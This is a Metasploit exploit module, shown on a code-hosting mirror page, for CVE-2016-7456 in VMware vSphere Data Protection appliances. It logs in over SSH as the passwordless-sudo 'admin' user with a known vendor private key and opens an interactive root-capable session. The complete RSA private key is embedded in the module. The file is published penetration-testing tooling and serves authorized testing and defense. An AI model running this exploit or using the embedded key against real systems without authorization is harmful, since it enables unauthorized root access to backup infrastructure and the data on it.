Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
28222 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  Rank = ExcellentRanking

11


12
  include Msf::Exploit::Remote::SSH

13
  include Msf::Auxiliary::Report

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'VMware VDP Known SSH Key',

21
          'Description' => %q{

22
            VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.

23
          },

24
          'Platform' => 'unix',

25
          'Arch' => ARCH_CMD,

26
          'Privileged' => true,

27
          'Targets' => [ [ 'Universal', {} ] ],

28
          'Payload' => {

29
            'Compat' => {

30
              'PayloadType' => 'cmd_interact',

31
              'ConnectionType' => 'find'

32
            }

33
          },

34
          'Author' => ['phroxvs'],

35
          'License' => MSF_LICENSE,

36
          'References' => [

37
            [ 'CVE', '2016-7456' ],

38
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],

39
            [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],

40
          ],

41
          'DisclosureDate' => '2016-12-20',

42
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

43
          'DefaultTarget' => 0,

44
          'Notes' => {

45
            'Stability' => [CRASH_SAFE],

46
            'Reliability' => [REPEATABLE_SESSION],

47
            'SideEffects' => []

48
          }

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        # Since we don't include Tcp, we have to register this manually

56
        Opt::RHOST(),

57
        Opt::RPORT(22)

58
      ], self.class

59
    )

60


61
    register_advanced_options(

62
      [

63
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

64
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

65
      ]

66
    )

67
  end

68


69
  # helper methods that normally come from Tcp

70
  def rhost

71
    datastore['RHOST']

72
  end

73


74
  def rport

75
    datastore['RPORT']

76
  end

77


78
  def do_login

79
    opt_hash = ssh_client_defaults.merge({

80
      auth_methods: ['publickey'],

81
      port: rport,

82
      key_data: [ key_data ]

83
    })

84
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']

85
    begin

86
      ssh_socket = nil

87
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

88
        ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)

89
      end

90
    rescue Rex::ConnectionError

91
      return

92
    rescue Net::SSH::Disconnect, ::EOFError

93
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

94
      return

95
    rescue ::Timeout::Error

96
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

97
      return

98
    rescue Net::SSH::AuthenticationFailed

99
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

100
    rescue Net::SSH::Exception => e

101
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

102
      return

103
    end

104


105
    if ssh_socket

106


107
      # Create a new session from the socket, then dump it.

108
      conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)

109
      sockets.delete(ssh_socket.transport.socket)

110


111
      return conn

112
    else

113
      return false

114
    end

115
  end

116


117
  def exploit

118
    conn = do_login

119
    if conn

120
      print_good 'Successful login'

121
      service_data = {

122
        address: rhost,

123
        port: rport,

124
        protocol: 'tcp',

125
        service_name: 'ssh',

126
        workspace_id: myworkspace_id

127
      }

128
      credential_data = {

129
        username: 'admin',

130
        private_type: :ssh_key,

131
        private_data: key_data,

132
        origin_type: :service,

133
        module_fullname: fullname

134
      }.merge(service_data)

135


136
      core = create_credential(credential_data)

137
      login_data = {

138
        core: core,

139
        last_attempted: Time.now

140
      }.merge(service_data)

141


142
      create_credential_login(login_data)

143
      handler(conn.lsock)

144
    end

145
  end

146


147
  def key_data

148
    <<~EOF

149
      -----BEGIN RSA PRIVATE KEY-----

150
      MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X

151
      /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16

152
      9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB

153
      gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3

154
      Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR

155
      Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT

156
      Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO

157
      c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR

158
      c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W

159
      LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3

160
      xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ

161
      gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr

162
      Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=

163
      -----END RSA PRIVATE KEY-----

164
    EOF

165
  end

166
end

167


168